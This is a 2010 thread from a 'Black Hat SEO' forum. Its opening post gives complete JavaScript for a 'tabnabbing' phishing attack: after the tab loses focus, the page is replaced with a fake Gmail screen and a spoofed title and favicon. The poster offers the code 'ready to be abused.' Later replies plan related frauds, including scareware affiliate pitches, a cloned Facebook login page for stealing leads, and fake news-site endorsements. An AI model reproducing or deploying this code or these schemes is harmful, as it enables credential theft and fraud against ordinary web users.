1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Tab Exploit

Discussion in 'Black Hat SEO' started by HaRRo, May 28, 2010.

  1. HaRRo

    HaRRo Elite Member

    Joined:
    Oct 29, 2005
    Messages:
    2,676
    Likes Received:
    13,447
    Occupation:
    Self Employed
    Location:
    Miami, FL
    Copy this to a whatever.js file

    Code:
    /*
    Blackhatworld.com
    */
    
    
    (function(){
    
    var TIMER = null;
    var HAS_SWITCHED = false;
    
    // Events
    window.onblur = function(){
      TIMER = setTimeout(changeItUp, 5000);
    }  
    
    window.onfocus = function(){
      if(TIMER) clearTimeout(TIMER);
    }
    
    // Utils
    function setTitle(text){ document.title = text; }
    
    // This favicon object rewritten from:
    // Favicon.js - Change favicon dynamically [http://ajaxify.com/run/favicon].
    // Copyright (c) 2008 Michael Mahemoff. Icon updates only work in Firefox and Opera.
    
    favicon = {
      docHead: document.getElementsByTagName("head")[0],
      set: function(url){
        this.addLink(url);
      },
      
      addLink: function(iconURL) {
        var link = document.createElement("link");
        link.type = "image/x-icon";
        link.rel = "shortcut icon";
        link.href = iconURL;
        this.removeLinkIfExists();
        this.docHead.appendChild(link);
      },
    
      removeLinkIfExists: function() {
        var links = this.docHead.getElementsByTagName("link");
        for (var i=0; i<links.length; i++) {
          var link = links[i];
          if (link.type=="image/x-icon" && link.rel=="shortcut icon") {
            this.docHead.removeChild(link);
            return; // Assuming only one match at most.
          }
        }
      },
      
      get: function() {
        var links = this.docHead.getElementsByTagName("link");
        for (var i=0; i<links.length; i++) {
          var link = links[i];
          if (link.type=="image/x-icon" && link.rel=="shortcut icon") {
            return link.href;
          }
        }
      }  
    };  
    
    
    function createShield(){
      div = document.createElement("div");
      div.style.position = "fixed";
      div.style.top = 0;
      div.style.left = 0;
      div.style.backgroundColor = "white";
      div.style.width = "100%";
      div.style.height = "100%";
      div.style.textAlign = "center";
      document.body.style.overflow = "hidden";
      
      img = document.createElement("img");
      img.style.paddingTop = "15px";
      img.src = "http://img.skitch.com/20100524-b639xgwegpdej3cepch2387ene.png";
      
      var oldTitle = document.title;
      var oldFavicon = favicon.get() || "/favicon.ico";
      
      div.appendChild(img);
      document.body.appendChild(div);
      img.onclick = function(){
        div.parentNode.removeChild(div);
        document.body.style.overflow = "auto";
        setTitle(oldTitle);  
        favicon.set(oldFavicon)
      }
      
    
    }
    
    function changeItUp(){
      if( HAS_SWITCHED == false ){
        createShield("https://mail.google.com");
        setTitle( "Gmail: Email from Google");    
        favicon.set("https://mail.google.com/favicon.ico");
        HAS_SWITCHED = true;    
      }
    }
      
      
    })();
    Then include it on a webpage.

    Now load up that page and flick to another firefox tab for 5 seconds and watch the other tab change. Click to new tab and look new content or phishing page :)

    Ready to be abused enjoy it while it lasts :)


    HERE IS A DEMO for those who dont understand it make sure to have multiple tabs open :)
    http://************/test/

    It should also work when minimizing firefox :)
     
    • Thanks Thanks x 44
  2. HaRRo

    HaRRo Elite Member

    Joined:
    Oct 29, 2005
    Messages:
    2,676
    Likes Received:
    13,447
    Occupation:
    Self Employed
    Location:
    Miami, FL
    Also im not promoting phishing with this but can be twisted for other things :)

    Good concept that can make some cash if used correctly :)
     
    • Thanks Thanks x 3
  3. d3t0x

    d3t0x Jr. VIP Jr. VIP Premium Member

    Joined:
    Oct 28, 2008
    Messages:
    1,956
    Likes Received:
    780
    Location:
    Vancouver, BC
    Do you mind giving one example? I am a trying to think what else this could be used for? Thanks for the share bro.
     
  4. HaRRo

    HaRRo Elite Member

    Joined:
    Oct 29, 2005
    Messages:
    2,676
    Likes Received:
    13,447
    Occupation:
    Self Employed
    Location:
    Miami, FL
    You could load a gateway, ads or an email submit form, or scare them and say something like HOW DARE YOU LOAD ANOTHER TAB OR MINIMIZE, then force them a link to an antivirus program, and say WE KNOW YOU DID THIS PREVENT EVERYONE ELSE SEEING HOW YOU BROWSE! Prevent it with Some affiliate link to AV program or firewall program etc... Just one quick idea :)
     
    • Thanks Thanks x 2
  5. HaRRo

    HaRRo Elite Member

    Joined:
    Oct 29, 2005
    Messages:
    2,676
    Likes Received:
    13,447
    Occupation:
    Self Employed
    Location:
    Miami, FL
    Again i do not want to promote the bad things possible here :)
     
    • Thanks Thanks x 3
  6. d3t0x

    d3t0x Jr. VIP Jr. VIP Premium Member

    Joined:
    Oct 28, 2008
    Messages:
    1,956
    Likes Received:
    780
    Location:
    Vancouver, BC
    Cool dude, thanks for the ideas
     
  7. onegg

    onegg Junior Member

    Joined:
    Dec 12, 2007
    Messages:
    147
    Likes Received:
    176
    Location:
    In your mind

    mmmm, but I have a couple of ideas in mind, I will twist the code a little :D
    thanks HaRRo

    onegg
     
  8. Mjordan

    Mjordan Power Member

    Joined:
    Jun 30, 2009
    Messages:
    519
    Likes Received:
    96
    Hmm I'm still confused by this. I tried the test page and it just changes to the gmail login page (which is unresponsive to clicks) for a second then back to your test page.
     
  9. chockfactor

    chockfactor Jr. VIP Jr. VIP Premium Member

    Joined:
    Jan 16, 2010
    Messages:
    451
    Likes Received:
    258
    Location:
    In your nightmares
    Hmm harro doesn't this belong in jr.vip?

    Just to keep the lifetime of it a little longer?
     
    Last edited: May 28, 2010
  10. dukefx

    dukefx Jr. VIP Jr. VIP Premium Member

    Joined:
    Mar 8, 2009
    Messages:
    246
    Likes Received:
    109
    Occupation:
    VP Information Technology
    Location:
    Dagobah
    What is he is NOT showing is how phishing can be used to steal passwords of gmail, paypal, etc. Move along .. this stuff is too illegal.

    Great from a technical perspective - a fellow code-hugger :)
     
  11. Mjordan

    Mjordan Power Member

    Joined:
    Jun 30, 2009
    Messages:
    519
    Likes Received:
    96
    Naw don't worry I don't wanna do any of that, I know I don't wanna get anywhere near that stuff. I used to phish on a smaller scale for stuff that couldn't get me in big trouble so don't speak to me like I don't know anything please.

    I liked his idea of the antivirus aff stuff.
     
  12. tacopalypse

    tacopalypse Executive VIP Jr. VIP Premium Member

    Joined:
    Nov 30, 2009
    Messages:
    980
    Likes Received:
    2,485
    Home Page:
    if you already control the url that the script is on, i don't really see how it would be helpful to sneakily redirect them to another url that you also control. why not just put all the stuff from url 2 onto url 1? why have it redirect at all?

    yea you could scare someone... or redirect them to lemonparty just for fun, but people don't generally part with their money when they think they've arrived at a site via malware infection.

    or maybe i'm just not seeing the big picture here... ?
     
  13. voyevoda

    voyevoda Regular Member Premium Member

    Joined:
    Mar 21, 2010
    Messages:
    217
    Likes Received:
    97
    Location:
    Eastern Front
    An example was posted here a few days ago, so almost everyone knows about it already: http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/

    There is definitely lots of potential for this if you can think out of the box a little.


    Check out the article I just linked above.
     
    • Thanks Thanks x 1
    Last edited: May 28, 2010
  14. tacopalypse

    tacopalypse Executive VIP Jr. VIP Premium Member

    Joined:
    Nov 30, 2009
    Messages:
    980
    Likes Received:
    2,485
    Home Page:
    ah ok, so url 2 has to pose as a familiar website. that makes a lot more sense.

    btw, our feeble minds are a lot more susceptible to this kind of attack than you may realize...

    http://www.youtube.com/watch?v=38XO7ac9eSs

    ;)
     
    • Thanks Thanks x 3
  15. googlemonster

    googlemonster Supreme Member

    Joined:
    Nov 15, 2008
    Messages:
    1,400
    Likes Received:
    525
    I see this on pron sites how do i prevent it grrr ha
     
  16. MarketerX

    MarketerX Regular Member

    Joined:
    Mar 7, 2010
    Messages:
    398
    Likes Received:
    120
    Hi Harro :) I really like the clickjacking thats been going on Facebook! Keep up the great work man.

    EDIT: Just out of curiosity, are you using this along with your clickjacking facebook apps which cause massive news feed spam which get people to install LoudMo downloads?
     
    Last edited: May 28, 2010
  17. HoNeYBiRD

    HoNeYBiRD Jr. VIP Jr. VIP

    Joined:
    May 1, 2009
    Messages:
    5,913
    Likes Received:
    7,150
    Gender:
    Male
    Occupation:
    Geographer, Tourism Manager
    Location:
    Ghosted
    bad things like this?
    Code:
    http://www.blackhatworld.com/blackhat-seo/blackhat-lounge/203633-tabnabbing-new-type-phishing-attack.html
     
  18. evilman11

    evilman11 Junior Member

    Joined:
    Apr 6, 2009
    Messages:
    149
    Likes Received:
    418
    Occupation:
    chillin at bhw and internet marketing
    Location:
    on the net making my pockets fatter
    heh, yea that's exactly what he had in mind. the possibilities with this exploit are almost endless. for instance, whats one of the most popular websites out right now that has the biggest user base? facebook of course... this exploit could easily be used to iframe email submits using the facebook login page. all you would have to do is copy the facebook landing page and replace the email field with a iframe from your email submit code and the login button with the submit code and just redirect to the actual facebook after they click login (most people don't log out so when they click login they will go to their account). make that come up when someone goes off to another tab so when they go searching through their open tabs they'll be like wtf, i got logged out of facebook? meh ill just log right back in.

    voila you just earned yourself a commission for that lead. of course you would definitely have to hide your traffic and wash it down with halfway decent junk traffic to the actual submit. im not going into exact details on how to do that. its just a possibility that this could be used for. of course, i don't recommend doing anything like this unless you know what your doing cause you will get shit canned from your network pretty quick if not done properly.
     
  19. RedSEO

    RedSEO Newbie

    Joined:
    May 13, 2010
    Messages:
    16
    Likes Received:
    1
    intellectual exercise:

    it can be used for lots of stuff. say its been inactive 1h+, that means someone has totally forgotten what was there. using the technique proposed in the original thread an immoral turd would know which one of the 20 largest news site the user uses. download todays frontpage, cashe it for the day after switching a piece of main content to his awsome endorsement of grownup diapers with a big buy link.

    BAM! Everyone wears diapers the next day!

    Or you could spawn multiple windows with his fave porn site, and propose a solution for all the evil spawning of a porn site he trust(ed).
     
    Last edited: May 29, 2010
  20. GreyWolf

    GreyWolf Executive VIP Jr. VIP

    Joined:
    Aug 17, 2009
    Messages:
    1,930
    Likes Received:
    5,389
    Gender:
    Male
    Occupation:
    Artist / Craftsman
    Location:
    sitting at my PC
    yeah I saw an article about this just the other day. If it's the one I'm thinking of, the power is in the fact that the user opens your page and it looks normal. Only after they switch to a different tab does it change your tab to a different page. It also spoofs the tab title and favicon so that when they come back to your tab they might think the tab their email account was left open and just timed out. They'll see the tab title looks ok, so they might just enter their login info without noticing the url in the addressbar is wrong.

    The biggest use is obviously for phishers, and it will be corrected regardless of it being posted here. It's not going to last, but until then there might be other ways to use it other than phishing. Maybe a way to push a cpa or something. It only works for firefox and a few similar type browsers. I think the article said in IE it will only change the page displayed in the tab, but won't change the tab title or favicon.

    It's a pretty cool idea, surely there must be a way of using it for something cool instead of just phishing sites. Like I said though it's already been reported, so certainly firefox will be making a fix for it soon.